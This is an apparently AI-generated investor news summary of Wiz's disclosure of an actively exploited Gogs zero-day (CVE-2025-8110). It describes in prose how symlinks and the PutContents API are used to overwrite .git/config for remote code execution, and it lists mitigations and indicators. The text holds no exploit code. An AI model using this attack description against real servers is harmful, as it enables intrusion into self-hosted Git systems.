Attackers are actively exploiting a zero-day in Gogs (CVE-2025-8110) — a default open-registration, self-hosted Git service — allowing remote code execution by abusing symlinks to overwrite files (notably .git/config) via the PutContents API; Wiz researchers report more than 700 of roughly 1,400 internet-exposed instances have been compromised and observed payloads using the Supershell C2. The flaw is a symlink bypass of an earlier RCE patch, maintainers are working on a fix but exploitation continues and attribution is uncertain (Wiz notes historical Supershell use by Asia-based actors), and investigators have limited visibility into post-compromise activity. Immediate mitigations advised are disabling open-registration, restricting internet exposure (put instances behind VPN), and hunting for random 8-character repos or unexpected PutContents usage — underscoring elevated operational and supply-chain risk for organizations running self-hosted Git until a patch is released.
Researchers at Wiz disclosed a critical zero-day (CVE-2025-8110) actively exploited in Gogs (<=0.13.3), a self-hosted Git service with open-registration enabled by default; Wiz found more than 700 of roughly 1,400 internet-exposed instances compromised, with indicators showing an 8-character random owner/repo created July 10 and payloads using the Supershell C2 framework. The vulnerability is a symlink bypass of a prior patch (CVE-2024-55947) that allows authenticated repository-creation users to overwrite files outside the repo via the PutContents API and achieve remote code execution by modifying .git/config (sshCommand). The flaw was discovered accidentally during malware analysis, maintainers are “currently working on a fix,” and exploitation continues in the wild. Wiz recommends immediate mitigations (disable open-registration, restrict internet exposure behind VPNs, hunt for random repos and unexpected PutContents activity); visibility is limited into post-compromise activity and attribution is uncertain though Supershell has historical ties to actors operating from Asia, raising elevated operational and supply-chain risk for organizations running self-hosted Git until a patch is released. The technical ease of exploitation (default permissions, trivial four-step workflow) and confirmed wide compromise elevate the near-term likelihood of follow-on misuse, credential theft, lateral movement, or further persistence given remote code execution capability. For affected environments where malware was visible, remediation removed the payload quickly, but Wiz lacks visibility across other compromised hosts, so the scope and data impact remain unknown and should be treated as material operational risk pending vendor patching and broader forensic sweeps. Investors should monitor Gogs’ fix release, published indicators of compromise, and incident counts as potential catalysts that influence migration away from self-hosted solutions, demand for IR/MSS services, and enterprise security budgets; until the vulnerability is patched, organizations running exposed Gogs instances face heightened remediation costs and potential downstream supply-chain exposures.
AI-powered research, real-time alerts, and portfolio analytics for institutional investors.
Request a DemoOverall Sentiment
strongly negative
Sentiment Score
-0.60
Ticker Sentiment
